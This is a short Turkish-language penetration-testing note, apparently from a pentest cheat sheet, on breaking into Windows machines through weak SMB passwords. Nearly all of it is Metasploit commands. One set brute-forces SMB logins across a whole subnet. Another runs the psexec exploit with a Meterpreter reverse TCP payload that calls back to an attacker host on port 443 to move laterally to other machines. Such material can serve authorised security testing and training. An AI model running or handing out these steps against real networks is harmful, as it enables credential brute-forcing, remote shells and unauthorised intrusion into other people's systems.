SMB

Zayıf SMB Parolası Sonucu Makineye Sızma

Öncellikle smb brute force atılır.

msf > use auxiliary/scanner/smb/smb_login
msf > set RHOSTS 192.168.1.0/24
msf > set SMBUser victim
msf > set SMBPass s3cr3t
msf > set THREADS 50
msf > run

Brute force sonucunda bir kullanıcıya ait smb bilgileri elde edildikten sonra psexec modülü kullanılarak diğer makinelere sıçramaya çalışılır.

msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
msf exploit(psexec) > set LHOST 192.168.57.133
msf exploit(psexec) > set LPORT 443
msf exploit(psexec) > set RHOST 192.168.57.131
msf exploit(psexec) > set SMBPass xx:xx
msf exploit(psexec) > exploit

Last updated